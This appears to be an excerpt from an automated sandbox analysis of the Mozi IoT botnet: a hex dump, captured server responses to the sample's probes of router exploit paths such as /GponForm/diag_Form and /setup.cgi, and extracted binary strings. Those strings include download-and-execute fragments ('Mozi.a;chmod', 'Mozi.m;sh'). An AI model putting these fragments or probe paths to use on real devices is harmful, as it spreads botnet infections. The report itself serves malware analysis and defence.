e4 83 28 40 3a b8 b9 86 8b 8f 19 a4 7e 03 98 a4 d6 ce 23 a5 c9 83 05 81 13 d0 92 0b 8c 40 52 b5 9c 47 a8 c8 fd ef 51 06 e9 ab 0f a8 b8 28 3e 12 f2 19 aa c5 01 78 1e ea e2 db a0 a6 2f 40 4d bf 01 6a e9 5a 34 bf f0 9c 96 c7 28 84 1c 22 95 48 79 36 48 9d 70 12 b3 77 c2 20 73 70 73 0b 94 31 b4 16 94 76 40 a5 d4 1b e4 f0 37 5c 49 bd e2 85 a4 06 d3 38 5c 18 a4 15 3a 0a ac a4 c6 a2 9b 47 f7 77 3f 93 69 04 71 b7 51 3a 57 13 fc b4 12 eb 79 74 a5 95 43 e5 c8 dd ae c6 08 58 98 cd 23 87 5b 17 7b c1 2f f7 30 2f a1 fc 49 ee df 92 2b 5d d5 d4 89 5c f6 81 6e ae e7 d7 7c 89 27 ac 34 ba c2 79 d2 03 50 b4 c2 79 64 74 ae 9d ed dd 50 5a 28 8e db 13 50 ba d0 5e cb a3 2b 6b 81 9b 5a 1b d7 bb b4 11 dc 95 73 8e 6b c1 90 34 93 13 a1 84 13 54 12 cb a8 dc 3f 2c 85 7a 04 83 72 1e 59 b7 93 68 4b 44 17 81 e0 f3 88 15 8b b0 44 98 b5 11 94 06 8b 79 14 33 ae 08 5b 8a 38 6c c5 15 15 6a d8 ec bb 5d 8d ad 99 9a 79 85 5c d0 79 64 99 41 54 27 b5 d1 0f c8 9c d0 aa 79 76 30 48 2d 33 a2 76 c0 b1 40 03 d6 b0 79 e4 ed 67 67 71 4c 6b 31 34 94 53 33 64 7b 4f 0e 99 ae e2 1c 29 d3 6a f8 60 a3 2c 8d c3 fd 6c 90 c6 2d 37 72 cd 77 d9 00 20 e5 62 dd 2a 40 36 86 d6 35 9a c8 af b7 3b 2d ef 58 41 a8 44 e3 a0 1b 10 34 46 1b 3f 65 5a 3f 0a 6c e7 a5 e0 1c 55 6b 91 b0 d1 1c 8f 80 53 47 89 33 54 59 49 1d 7a f2 d2 5c e2 22 1c b2 51 76 2b 91 5a 84 b0 0c ed f2 30 8d b9 58 f7 c4 69 05 6d 1e 23 1c 1d 15 d2 fb 3e 08 59 93 51 2b ba 8f 42 a4 1c 4d b7 55 6d 09 5d 39 0d b5 23 c9 08 e4 72 56 3b 32 69 fe b7 64 0a 1b 32 3e 6b 56 37 a4 58 49 09 55 4e 92 73 a0 ca fb 5f 50 8b 7c 0f db 20 27 1d aa 50 52 28 24 b9 d4 ec 11 2a 3e 6b 07 86 8c fd ac ca c9 18 0a ad 1c 91 62 59 3a f0 ce 26 93 91 df 6a 86 a7 5b 19 d6 72 49 d9 23 e1 d4 3c 82 44 ca 85 5a 12 e7 6f f4 5f 05 48 6d 4d d5 b1 19 bd 25 a2 ec da ff a5 b1 3f 72 7c 29 4b 46 a3 d3 a3 cd 34 2e 93 fe b4 81 7f 51 b1 b2 15 ce d0 1d 11 3c a8 56 69 a5 83 16 c9 b9 b7 60 33 b4 95 1f 76 ba 18 94 74 eb 6d f8 1b dd c1 cd bb 19 4c f8 19 9d 9c 5f e4 13 c6 a6 6f 92 d3 0b 78 9d af a4 bc 3c 96 f0 fb 8b 34 1e 8d c7 64 94 90 f1 14 92 f1 ec fc cd 6c f4 06 ee ef ae 9e 8a 92 96 e3 4e 8e 06 6d e9 df 9b 8c 46 7b 7f 25 c3 53 d8 3b b5 7b 73 bc 95 3d ff 47 2f 26 e2 34 2e c7 7b ee c6 81 bc d9 a0 5b b0 21 19 74 32 1c f1 b5 65 77 95 93 69 47 ea 03 f2 ec 63 67 53 52 47 4a 1f e5 0a
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 28 Jan 2022 12:59:10 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: closeX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTServer: cloudflareCF-RAY: 6d4a657b98069274-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 30 33 Data Ascii: error code: 1003
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Fri, 28 Jan 2022 12:59:10 GMTContent-Type: text/htmlContent-Length: 915Connection: keep-aliveX-Cache: Error from cloudfrontVia: 1.1 daeeb7c460b443acd6ac3d0db8e793a8.cloudfront.net (CloudFront)X-Amz-Cf-Pop: TPE52-C1X-Amz-Cf-Id: rT_EXyjGCrOYN6jK3oiEJBLgPD5vlbz5rYP3i1_hLi-jGrIW7R2C1Q==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 33 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 42 61 64 20 72 65 71 75 65 73 74 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 3c 50 52 45 3e 0a 47 65 6e 65 72 61 74 65 64 20 62 79 20 63 6c 6f 75 64 66 72 6f 6e 74 20 28 43 6c 6f 75 64 46 72 6f 6e 74 29 0a 52 65 71 75 65 73 74 20 49 44 3a 20 72 54 5f 45 58 79 6a 47 43 72 4f 59 4e 36 6a 4b 33 6f 69 45 4a 42 4c 67 50 44 35 76 6c 62 7a 35 72 59 50 33 69 31 5f 68 4c 69 2d 6a 47 72 49 57 37 52 32 43 31 51 3d 3d 0a 3c 2f 50 52 45 3e 0a 3
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 28 Jan 2022 12:59:28 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 211Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 2f 73 65 74 75 70 2e 63 67 69 0a 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /setup.cgion this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Microsoft-IIS/10.0Date: Fri, 28 Jan 2022 12:59:22 GMTContent-Length: 0
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 28 Jan 2022 13:04:39 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 28 Jan 2022 13:04:39 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/7.5X-Powered-By: ASP.NETDate: Fri, 28 Jan 2022 13:00:07 GMTConnection: closeContent-Length: 1163Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 d5 d2 b2 bb b5 bd ce c4 bc fe bb f2 c4 bf c2 bc a1 a3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e b7 fe ce f1 c6 f7 b4 ed ce f3 3c 2f
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 28 Jan 2022 13:00:31 GMTContent-Type: application/json; charset=UTF-8Connection: closeX-Powered-By: PHP/7.4.27Access-Control-Allow-Origin: *Access-Control-Expose-Headers: X-Set-Token, X-Pagination-Total-Count, X-Pagination-Current-Page, X-Pagination-Page-Count, X-Pagination-Per-Page, DateX-Request-Id: 9d06b78bea2708d7e8e3bc7ac0321d13d3c8de1c6e6fb6477d83ef094784b472Set-Cookie: SERVERID=w02-8888; path=/Data Raw: 7b 22 6e 61 6d 65 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 22 2c 22 63 6f 64 65 22 3a 30 2c 22 73 74 61 74 75 73 22 3a 34 30 34 2c 22 70 72 65 76 69 6f 75 73 22 3a 7b 22 6e 61 6d 65 22 3a 22 49 6e 76 61 6c 69 64 20 52 6f 75 74 65 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 55 6e 61 62 6c 65 20 74 6f 20 72 65 73 6f 6c 76 65 20 74 68 65 20 72 65 71 75 65 73 74 20 5c 22 73 65 74 75 70 2e 63 67 69 5c 22 2e 22 2c 22 63 6f 64 65 22 3a 30 7d 7d Data Ascii: {"name":"Not Found","message":"Page not found.","code":0,"status":404,"previous":{"name":"Invalid Route","message":"Unable to resolve the request \"setup.cgi\".","code":0}}
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 13:00:28 GMTServer: Apache/2.4.6 (CentOS)Content-Length: 216Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 47 70 6f 6e 46 6f 72 6d 2f 64 69 61 67 5f 46 6f 72 6d 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /GponForm/diag_Form was not found on this server.</p></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.17.10Date: Fri, 28 Jan 2022 13:00:37 GMTContent-Type: text/htmlContent-Length: 154Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 37 2e 31 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.17.10</center></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 295Date: Fri, 28 Jan 2022 13:00:45 GMTData Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 74 65 78 74 3d 23 30 30 30 30 30 30 20 62 67 63 6f 6c 6f 72 3d 23 66 66 66 66 66 66 3e 0a 3c 68 31 3e 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 68 32 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 3c 63 6f 64 65 3e 2f 47 70 6f 6e 46 6f 72 6d 2f 64 69 61 67 5f 46 6f 72 6d 3c 2f 63 6f 64 65 3e 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 68 32 3e 0a 3c 68 32 3e 3c 2f 68 32 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><title>404 Not Found</title></head><body text=#000000 bgcolor=#ffffff><h1>Error: Not Found</h1><h2>The requested URL <code>/GponForm/diag_Form</code> was not found on this server.</h2><h2></h2></body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 28 Jan 2022 13:00:51 GMTServer: ApacheAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0Connection: closeContent-Type: text/htmlData Raw: 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: mini_httpd/1.19 19dec2003Date: Fri, 28 Jan 2022 16:03:05 GMTCache-Control: no-cache,no-storeContent-Type: text/html; charset=%sConnection: closeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 6e 69 5f 68 74 74 70 64 2f 22 3e 6d 69 6e 69 5f 68 74 74 70 64 2f 31 2e 31 39 20 31 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999" TEXT="#000000" LINK="#2020ff" VLINK="#4040cc"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/mini_httpd/">mini_httpd/1.19 19dec2003</A></ADDRESS></BODY></HTML>
Source: networks.12.dr String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: Mozi.m.3, networks.12.dr String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: networks.12.dr String found in binary or memory: http://%s:%d/Mozi.m
Source: Mozi.m.3, networks.12.dr String found in binary or memory: http://%s:%d/Mozi.m;
